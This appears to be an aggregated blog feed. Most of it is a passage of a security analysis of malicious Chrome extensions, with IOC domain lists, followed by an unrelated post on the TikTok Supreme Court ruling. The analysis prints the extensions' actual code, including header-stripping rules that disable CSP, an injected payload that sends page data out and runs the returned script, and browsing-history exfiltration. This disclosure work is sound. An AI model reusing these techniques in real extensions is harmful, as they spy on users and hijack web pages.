Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.

Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):

let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
    method: 'POST',
    body: JSON.stringify({installParams}),
    headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
    chrome.storage.local.set({
        shortcuts: {
            list: data.shortcuts,
            updatedAt: Date.now(),
        }
    });
}
if (data.volumeHeaders) {
    chrome.storage.local.set({
        volumeHeaderRules: data.volumeHeaders
    });
}
if (data.newsPage) {
    this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}

This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file represent three malicious functions of the extensions.

Injecting HTML code into web pages

The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:

Screenshot of a web page footer with the Privacy, Terms and Settings links. Overlaying the latter is a colored diagonal arrow with a rectangular pink border.

And if you move your mouse pointer to that button a message shows up:

Screenshot of a web page footer. Overlaying it is a pink pop-up saying: To go Full-Screen, press F11 when watching a video.

That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.

And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.

“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.

Abusing declarativeNetRequest API

There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.

The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:

[
    {
        "id": 1,
        "priority": 1,
        "action": {
            "type": "modifyHeaders",
            "responseHeaders": [
                { "header": "gain-id", "operation": "remove" },
                { "header": "basic-gain", "operation": "remove" },
                { "header": "audio-simulation-64-bit", "operation": "remove" },
                { "header": "content-security-policy", "operation": "remove" },
                { "header": "audio-simulation-128-bit", "operation": "remove" },
                { "header": "x-frame-options", "operation": "remove" },
                { "header": "x-context-audio", "operation": "remove" }
            ]
        },
        "condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
    }
]

This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing Content-Security-Policy header is meant to disable CSP protection on all websites. And removing X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.

But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.

The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests which on the first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” requests when a website loads a script from a trusted source, making it get a malicious script instead – another way to hijack websites.

Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.

Opening new tabs

Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.

Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will take any options, other extensions will sometimes allow only specific options instead. One option that the developers of these extensions seem to particularly care about is active which allows opening tabs in background. This makes me suspect that the point of this feature is displaying pop-under advertisements.

The scheme summarized

There are many extensions similar to Volume Booster. The general approach seems to be:

  1. Make sure that the extension has permission to access all websites. Find a pretense why this is needed – or don’t, Google doesn’t seem to care too much.
  2. Find a reason why the extension needs to download its configuration from a web server. It doesn’t need to be convincing, nobody will ever ask why you couldn’t just keep that “configuration” in the extension.
  3. Use a part of that configuration in HTML code that the extension will inject in web pages. Of course you should “forget” to do any escaping or sanitization, so that HTML injection is possible.
  4. Feed another part of the configuration to declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.

Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once, instead the support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing is to come here any more.

The payload

After I already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:

<img height="1" width="1" src="data:image/gif;base64,…"
     onload="(() => {…})();this.remove()">

This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:

if (isGoogle() || isFrame()) {
    hideIt();
    const script = yield loadScript();
    if (script) {
        window.eval.call(window, script);
        window.gsrpdt = 1;
        window.gsrpdta = '_new'
    }
}

The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.

The second code block looks like this (somewhat simplified for readability):

if (window.top == window.self) {
    let response = await fetch('https://everyview.info/c', {
        method: 'POST',
        body: btoa(unescape(encodeURIComponent(JSON.stringify({
            u: 'm5zthzwa3mimyyaq6e9',
            e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
            d: document.location.hostname,
            t: document.title,
            'iso': 4
        })))),
        headers: {
            'Content-Type': 'text/plain'
        },
        credentials: 'include'
    });
    let text = await response.text();
    runScript(decodeURIComponent(escape(atob(text))));
} else {
    window.addEventListener('message', function(event) {
        event && event.data && event.data.boosterWorker &&
            event.data.booster && runScript(event.data.booster);
    });
}

So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result are ads which can be barely distinguished from actual search results, here is what I get searching for “amazon” for example:

Screenshot of what looks like Google search results, e.g. a link titled “Amazon Produkte - -5% auf alle Produkte”. The website mentioned above it is conrad.de however rather than amazon.de.

The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.

The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:

Screenshot of search results. Above a link titled “Amazon - Import US to Germany” with the domain myus.com. Below an actual Amazon.de link. Both have exactly the same visuals.

Who is behind these extensions?

These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.

Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers to earn money with various kinds of ads. Clearly, there has been some competence transfer here.

Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knifes.

Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.

Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.

The affected extensions

The following extensions are associated with Phoenix Invicta:

Name Weekly active users Extension ID Featured
Click & Pick 20 acbcnnccgmpbkoeblinmoadogmmgodoo
AdBlock for Youtube: Skip-n-Watch 3,000 coebfgijooginjcfgmmgiibomdcjnomi
Dopni - Automatic Cashback Service 19 ekafoahfmdgaeefeeneiijbehnbocbij
SkipAds Plus 95 emnhnjiiloghpnekjifmoimflkdmjhgp
1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) 10,000 fmpgmcidlaojgncjlhjkhfbjchafcfoe
Better Color Picker - pick any color in Chrome 10,000 gpibachbddnihfkbjcfggbejjgjdijeb
Easy Dark Mode 869 ibbkokjdcfjakihkpihlffljabiepdag
Manuals Viewer 101 ieihbaicbgpebhkfebnfkdhkpdemljfb
ScreenCapX - Full Page Screenshot 20,000 ihfedmikeegmkebekpjflhnlmfbafbfe
Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) 48 lkalpedlpidbenfnnldoboegepndcddk
AdBlock - Ads and Youtube 641 nonajfcfdpeheinkafjiefpdhfalffof
Manual Finder 2024 280 ocbfgbpocngolfigkhfehckgeihdhgll
Volume Booster - Super Sound Booster 8,000 ojkoofedgcdebdnajjeodlooojdphnlj
Font Expert: Identify Fonts from Images & Websites 666 pjlheckmodimboibhpdcgkpkbpjfhooe

The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.

Name Weekly active users Extension ID Featured
Screen Recorder 685 bgnpgpfjdpmgfdegmmjdbppccdhjhdpe
Halloween backgrounds and stickers for video calls and chats 31 fklkhoeemdncdhacelfjeaajhfhoenaa
AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings 46 iedbphhbpflhgpihkcceocomcdnemcbj
Beauty Filter 136 mleflnbfifngdmiknggikhfmjjmioofi
Background Noise Remover 363 njmhcidcdbaannpafjdljminaigdgolj
Camera Picture In Picture (PIP Overlay) 576 pgejmpeimhjncennkkddmdknpgfblbcl

Netflix Party

Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.

Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.

Spying on the users

Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if ("complete" === changeInfo.status) {
    let params = {
      url: tab.url,
      userId: await chrome.storage.sync.get("userId")
    };
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(params)
    });
    const rules = await response.json();
    
  }
});

Supposedly, this code downloads a set of site-specific rules. This could in theory be legitimate functionality not meant to spy on users. That it isn’t legitimate functionality here isn’t indicated merely by the fact that the endpoint doesn’t produce any really meaningful responses. Legitimate functionality not intending to spy wouldn’t send a unique user ID with the request, the page address would be cut down to the host name (or would at least have all parameters removed) and the response would be cached. The latter would happen simply to reduce the load on this endpoint, something that anybody does unless the endpoint is paid for with users’ data.

The bogus rule processing

Nothing about the section above is new, I’ve already written as much in 2023. But either I haven’t taken a close look at the rule processing back then or it got considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):

for (const key in rules)
  if ("id" === key || "genericId" === key)
    // Remove elements by ID
  else if ("class" === key || "genericClass" === key)
    // Remove elements by class name
  else if ("innerText" === key)
    // Remove elements by text
  else if ("rules" === key)
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  else if ("cc" === key)
    // Bogus logic to let the server decide which language-specific filter list
    // should be enabled

The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:

async function applyRules(rules, scope, tabId) {
  if ("global" !== scope) {
    if (0 !== rules.length) {
      const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
      const ruleIds = existingRules.map(rule => rule.id);
      chrome.declarativeNetRequest.updateDynamicRules({
        removeRuleIds: ruleIds,
        addRules: rules
      });
    }
  } else {
    chrome.tabs.sendMessage(tabId, {
      message: "start",
      link: rules
    });
  }
}

So if the “scope” is anything but "global" the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse as we’ve seen already. Given what McAfee discovered about these extensions before this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.

And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.

Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules, others not so much.

The affected extensions

Name Weekly active users Extension ID Featured
Auto Refresh Plus 100,000 ffejlioijcokmblckiijnjcmfidjppdn
Smart Auto Refresh 100,000 fkjngjgmgbfelejhbjblhjkehchifpcj
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca
AutoBuy Flash Sales, Deals, and Coupons 20,000 gbnahglfafmhaehbdmjedfhdmimjcbed
Autoskip for Youtube™ Ads 200,000 hmbnhhcgiecenbbkgdoaoafjpeaboine
Smart Adblocker 50,000 iojpcjjdfhlcbgjnpngcmaojmlokmeii
Adblock for Browser 10,000 jcbjcocinigpbgfpnhlpagidbmlngnnn
Netflix Party 500,000 mmnbenehknklpbendgmgngeaignppnbe
Free adblocker 8,000 njjbfkooniaeodkimaidbpginjcmhmbm
Video Ad Block Youtube 100,000 okepkpmjhegbhmnnondmminfgfbjddpb
Picture in Picture for Videos 30,000 pmdjjeplkafhkdjebfaoaljknbmilfgo

Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.

Sweet VPN

I’ll be looking at Sweet VPN as representative for 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either, my post in 2023 already named three of them even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it, I didn’t have time to investigate each extension thoroughly.

These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.

Anti-debugging protection

For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result are three values which are used like this:

value1({value2: value3}, result => {
  
});

This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:

chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
  
});

Guessing further functionality

This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:

"permissions": [
  "proxy",
  "storage",
  "tabs"
],
"host_permissions": [
  "https://ipapi.co/json/",
  "https://ip.seeip.org/geoip",
  "https://api.myip.com/",
  "https://ifconfig.co/json"
],

Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.

In fact, once you know that the function being passed as parameter is a tabs.onUpdated listener its logic becomes way easier to understand, despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events the queue is sent to the same address where the extension downloads its configuration from.

There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.

The affected extensions

Name Weekly active users Extension ID Featured
VK UnBlock. Works fast. 40,000 ahdigjdpekdcpbajihncondbplelbcmo
VPN Proxy Master 120 akkjhhdlbfibjcfnmkmcaknbmmbngkgn
VPN Unblocker for Instagram 8,000 akmlnidakeiaipibeaidhlekfkjamgkm
StoriesHub 100,000 angjmncdicjedpjcapomhnjeinkhdddf
Facebook and Instagram Downloader 30,000 baajncdfffcpahjjmhhnhflmbelpbpli
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe
TikTok in USA 20,000 bgcmndidjhfimbbocplkapiaaokhlcac
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi
Access to Odnoklassniki 4,000 ccaieagllbdljoabpdjiafjedojoejcl
Ghost - Anonymous Stories for Instagram 20,000 cdpeckclhmpcancbdihdfnfcncafaicp
StorySpace Manager for FB and IG Stories 10,000 cicohiknlppcipjbfpoghjbncojncjgb
VPN Unblocker for YouTube 40,000 cnodohbngpblpllnokiijcpnepdmfkgm
Universal Video Downloader 200,000 cogmkaeijeflocngklepoknelfjpdjng
Free privacy connection - VPN guru 500,000 dcaffjpclkkjfacgfofgpjbmgjnjlpmh
Live Recorder for Instagram aka MasterReco 10,000 djngbdfelbifdjcoclafcdhpamhmeamj
Video Downloader for Vimeo 100,000 dkiipfbcepndfilijijlacffnlbchigb
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab
Insured Smart VPN - Best Proxy ever unblock everything 2,000 idoimknkimlgjadphdkmgocgpbkjfoch
Ultra Downloader for Instagram 30,000 inekcncapjijgfjjlkadkmdgfoekcilb
Parental Control. Blocks porn, malware, etc. 3,000 iohpehejkbkfdgpfhmlbogapmpkefdej
UlV. Ultimate downloader for Vimeo 2,000 jpoobmnmkchgfckdlbgboeaojhgopidn
Simplify. Downloader for Instagram 20,000 kceofhgmmjgfmnepogjifiomgojpmhep
Download Facebook Video 591 kdemfcffpjfikmpmfllaehabkgkeakak
VPN Unblocker for Facebook 3,000 kheajjdamndeonfpjchdmkpjlemlbkma
Video Downloader for FaceBook 90,000 kjnmedaeobfmoehceokbmpamheibpdjj
TikTok Video Keeper 40,000 kmobjdioiclamniofdnngmafbhgcniok
Mass Downloader for Instagram 100,000 ldoldiahbhnbfdihknppjbhgjngibdbe
Stories for FaceBook - Anon view, download 3,000 nfimgoaflmkihgkfoplaekifpeicacdn
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc
TikTok Video Downloader 20,000 oaceepljpkcbcgccnmlepeofkhplkbih
Video Downloader for FaceBook 10,000 ododgdnipimbpbfioijikckkgkbkginh
Exta: Pro downloader for Instagram 10,000 ppcmpaldbkcoeiepfbkdahoaepnoacgd

Bonus section: more malicious extensions

Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.

As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them also devised their mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.

Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.

EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective server. EasyNav also removes security headers. These extensions don’t bother with HTML injection however, instead their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.

Download Manager Integration Checklist is merely supposed to display some instructions, it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.

Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and the instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script however.

The affected extensions

Name Weekly active users Extension ID Featured
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo
EasyNav 30,000 aobeidoiagedbcogakfipippifjheaom
Adblock Bear - stop invasive ads 100,000 gdiknemhndplpgnnnjjjhphhembfojec
AdBlock 360 400,000 ghfkgecdjkmgjkhbdpjdhimeleinmmkl
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj

IOCs

The following domain names are associated with Phoenix Invicta:

  • 1-click-cp[.]com
  • adblock-ads-and-yt[.]pro
  • agadata[.]online
  • anysearch[.]guru
  • anysearchnow[.]info
  • astatic[.]site
  • astato[.]online
  • astralink[.]click
  • best-browser-extensions[.]com
  • better-color-picker[.]guru
  • betterfind[.]online
  • capture-it[.]online
  • chrome-settings[.]online
  • click-and-pick[.]pro
  • color-picker-quick[.]info
  • customcursors[.]online
  • dailyview[.]site
  • datalocked[.]online
  • dmext[.]online
  • dopni[.]com
  • doublestat[.]info
  • doubleview[.]online
  • easy-dark-mode[.]online
  • emojikeyboard[.]site
  • everyview[.]info
  • fasterbrowser[.]online
  • fastertabs[.]online
  • findmanual[.]org
  • fivem[.]com[.]tr
  • fixfind[.]online
  • font-expert[.]pro
  • freestikers[.]top
  • freetabmemory[.]online
  • get-any-manual[.]pro
  • get-manual[.]info
  • getresult[.]guru
  • good-ship[.]com
  • gulkayak[.]com
  • isstillalive[.]com
  • kralforum[.]com[.]tr
  • locodata[.]site
  • lottingem[.]com
  • manual-finder[.]site
  • manuals-viewer[.]info
  • megaboost[.]site
  • nocodata[.]online
  • ntdataview[.]online
  • picky-ext[.]pro
  • pocodata[.]pro
  • readtxt[.]pro
  • rumorpix[.]com
  • screencapx[.]co
  • searchglobal[.]online
  • search-protection[.]org
  • searchresultspage[.]online
  • shurkul[.]online
  • skipadsplus[.]online
  • skip-all-ads[.]info
  • skip-n-watch[.]info
  • skippy[.]pro
  • smartsearch[.]guru
  • smartsearch[.]top
  • socialtab[.]top
  • soundbooster[.]online
  • speechit[.]pro
  • super-sound-booster[.]info
  • tabmemoptimizer[.]site
  • taboptimizer[.]com
  • text-speecher[.]online
  • topodat[.]info
  • triplestat[.]online
  • true-sound-booster[.]online
  • ufind[.]site
  • video-downloader-click-save[.]online
  • video-downloader-plus[.]info
  • vipoisk[.]ru
  • vipsearch[.]guru
  • vipsearch[.]top
  • voicereader[.]online
  • websiteconf[.]online
  • youtube-ads-skip[.]site
  • ystatic[.]site

The following domain names are used by Netflix Party and related extensions:

  • abforbrowser[.]com
  • autorefresh[.]co
  • autorefreshplus[.]in
  • getmatchingcouponsanddeals[.]info
  • pipextension[.]com
  • smartadblocker[.]com
  • telenetflixparty[.]com
  • ytadblock[.]com
  • ytadskip[.]com

The following domain names are used by Sweet VPN and related extensions:

  • analyticsbatch[.]com
  • aquafreevpn[.]com
  • batchindex[.]com
  • browserdatahub[.]com
  • browserlisting[.]com
  • checkbrowserer[.]com
  • countstatistic[.]com
  • estimatestatistic[.]com
  • metricbashboard[.]com
  • proxy-config[.]com
  • qippin[.]com
  • realtimestatistic[.]com
  • secondstatistic[.]com
  • securemastervpn[.]com
  • shceduleuser[.]com
  • statisticindex[.]com
  • sweet-vpn[.]com
  • timeinspection[.]com
  • traficmetrics[.]com
  • trafficreqort[.]com
  • ultimeo-downloader[.]com
  • unbansocial[.]com
  • userestimate[.]com
  • virtualstatist[.]com
  • webstatscheck[.]com

These domain names are used by the extensions in the bonus section:

  • adblock-360[.]com
  • easynav[.]net
  • internetdownloadmanager[.]top
  • privacy-bear[.]net
  • skipads-ytb[.]com
  • translatories[.]com

Don MartiSupreme Court files confusing bug report

I’m still an Internet optimist despite…things…so I was hoping that Friday’s Supreme Court opinion in the TikTok case would have some useful information about how to design online social networking in a way that does get First Amendment protection, even if TikTok doesn’t. But no. Considered as a bug report, the opinion doesn’t help much. We basically got (1) TikTok collects lots of personal info (2) Congress gets to decide if and how it’s a national security problem to make personal info available to a foreign adversary, and so TikTok is banned. But everyone else doing social software, including collaboration software, is going to have a lot to find out for themselves.

The Supreme Court pretty much ignores TikTok’s dreaded For You Page algorithm and focuses on the privacy problem. So we don’t know if some future ban of some hypothetical future app that somehow fixed its data collection issues would hold up in court just based on how it does content recommendations. (Regulating recommendation algorithms is a big issue that I’m not surprised the Court couldn’t agree on in the short time they had for this case.) We also get the following, on p. 9—TikTok got the benefit of the doubt and received some First Amendment consideration that future apps might or might not.

This Court has not articulated a clear framework for determining whether a regulation of non-expressive activity that disproportionately burdens those engaged in expressive activity triggers heightened review. We need not do so here. We assume without deciding that the challenged provisions fall within this category and are subject to First Amendment scrutiny.

Page 11 should be good news for anybody drafting a privacy law anyway. Regulating data collection is content neutral for First Amendment purposes—which should be common sense.

The Government also supports the challenged provisions with a content-neutral justification: preventing China from collecting vast amounts of sensitive data from 170 million U. S. TikTok users. That rationale is decidedly content agnostic. It neither references the content of speech on TikTok nor reflects disagreement with the message such speech conveys….Because the data collection justification reflects a purpose[e] unrelated to the content of expression, it is content neutral.

The outbound flow of data from people in the USA is what makes the TikTok ban hold up in court. Prof. Eric Goldman writes that the ban is taking advantage of a privacy pretext for censorship, which is definitely something to watch out for in future privacy laws, but doesn’t apply in this case.

But so far the to-do list for future apps looks manageable.

  • Don’t surveil US users for a foreign adversary

  • Comply with whatever future restrictions on recommendation algorithms turn out to hold up in court. (Disclosure of rules or source code? Allow users to switch to chronological? Allow client-side or peer-to-peer filtering and scoring? Lots of options but possible to get out ahead of.)

Not so fast. Here’s the hard part. According to the Court the problem is not just the info that the app collects automatically and surreptitiously, or the user actions it records, but also the info that users send by some deliberate action. On page 14:

If, for example, a user allows TikTok access to the user’s phone contact list to connect with others on the platform, TikTok can access any data stored in the user’s contact list, including names, contact information, contact photos, job titles, and notes. Access to such detailed information about U. S. users, the Government worries, may enable China to track the locations of Federal employees and contractors, build dossiers of personal information for blackmail, and conduct corporate espionage.

and in Justice Gorsuch’s concurrence,

According to the Federal Bureau of Investigation, TikTok can access any data stored in a consenting user’s contact list—including names, photos, and other personal information about unconsenting third parties. Ibid. (emphasis added). And because the record shows that the People’s Republic of China (PRC) can require TikTok’s parent company to cooperate with [its] efforts to obtain personal data, there is little to stop all that information from ending up in the hands of a designated foreign adversary.

On the one hand, yes, sharing contacts does transfer a lot of information about people in the USA to TikTok. But sharing a contact list with an app can work a lot of different ways. It can be

  1. covert surveillance (although mobile platforms generally do their best to prevent this)

  2. data sharing that you get tricked into

  3. deliberate, more like choosing to email a copy of the company directory as an attachment

If it’s really a problem to enable a user to choose to share contact info, then that makes running collaboration software like GitHub in China a problem from the USA side. (Git repositories are full of metadata about who works on what, with who. And that information is processed by other users, by the platform itself, and by third-party tools.) Other content creation tools also share the kinds of info on skills and work relationships that would be exactly what a foreign adversary murder robot needs to prioritize targets. But the user, not some surveillance software, generally puts that info there. If intentional contact sharing by users is part of the reason that the USA can ban TikTok, what does that mean for other kinds of user to user communication?

Kleptomaniac princesses

There’s a great story I read when I was a kid that I wish I had the citation for. It might be fictional, but I’m going to summarize it anyway because it’s happening again.

Once upon a time there was a country that the UK really, really wanted to maintain good diplomatic relations with. The country was in a critical strategic location and had some kind of natural resources or something, I don’t remember the details. The problem, though, was that the country was a monarchy, and one of the princesses loved to visit London and shoplift. And she was really bad at it. So diplomats had to go around to the stores in advance to tell the manager what’s going on, convince the store to let her steal stuff, and promise to settle up afterwards.

Today, the companies that run the surveillance apps are a lot like that princess. techbros don’t have masculine energy, they have kleptomaniac princess energy If one country really needs to maintain good relations with another, they’ll allow that country’s surveillance apps to get away with privacy shenanigans. If relations get chillier, then normal law enforcement applies. At least for now, though, we don’t know what the normal laws here will look like, and the Supreme Court didn’t provide many hints yesterday.

Related

Big Tech platforms: mall, newspaper, or something else? A case where the Supreme Court did give better instructions (to state legislators, though, not app developers)

In TikTok v. Garland, Supreme Court Sends Good Vibes for Privacy Laws, But Congress’s Targeting of TikTok Alone Won’t Do Much to Protect Privacy by Tom McBrien, EPIC Counsel. The Court’s opinion was also a good sign for privacy advocates because it made clear that regulating data practices is an important and content-neutral regulatory intervention. Tech companies and their allies have long misinterpreted a Supreme Court case called Sorrell v. IMS Health to mean that all privacy laws are presumptively unconstitutional under the First Amendment because information is speech. But the TikTok Court explained that passing a law to protect privacy is decidedly content agnostic because it neither references the content of speech…nor reflects disagreement with the message such speech conveys. In fact, the Court found the TikTok law constitutional specifically on the grounds that it was passed to regulate privacy and emphasized how important the government interest is in protecting American’s privacy.

Bonus links

